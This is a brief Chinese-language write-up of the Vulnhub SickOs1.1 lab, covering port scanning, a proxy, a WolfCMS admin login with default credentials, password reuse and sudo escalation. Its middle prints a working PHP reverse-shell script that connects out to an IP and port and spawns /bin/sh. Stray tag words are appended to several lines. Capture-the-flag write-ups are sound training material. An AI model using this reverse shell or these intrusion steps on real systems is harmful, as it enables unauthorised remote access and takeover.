【Vulnhub】SickOs1.1


靶機地址:php

https://www.vulnhub.com/entry/sickos-11,132/python


nmap 掃描一下端口linux



3128 端口開着一個代理服務,使用它提供的代理去訪問一下web



訪問 robots 獲得一個 cmsshell



訪問 robots.txt 中的 /wolfcms數據庫



搜一下,獲得後臺登陸頁面:/?/admin/loginbash



使用默認帳號密碼 admin:admin 登陸成功微信

後臺能夠寫文件啥的,寫個 php 的反彈 shellssh

<?php
$ip = '192.168.17.1';
$port = '6666';
$sock = fsockopen($ip, $port);
$descriptorspec = array(
    0 => $sock,
    1 => $sock,
    2 => $sock
);
$process = proc_open('/bin/sh',$descriptorspec, $pipes);
proc_close($process);
?>


在 config.php 中找到了數據庫的用戶名與密碼編輯器



用數據庫的那個密碼試一下,登陸用戶:sickos,成功!

同時既然已經知道了密碼,sudo -s 直接拿到了 root 權限



沒學到什麼新的知識 Orz,如今作靶機感受愈來愈沒啥意思了,想一想該是由於是參考了別人的 wp 作出來的吧 。作了也 30 多個了,後面就儘可能本身作,反正跟 CTF 題同樣必然有解,這樣應該就不能一週一更了,畢竟大部分時間仍是想放在 pwn 的學習上。

就這字數還不夠!?阿巴阿巴阿巴阿巴阿巴阿巴🤤

本文分享自微信公衆號 - 陳冠男的遊戲人生(CGN-115)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。

相關文章
相關標籤/搜索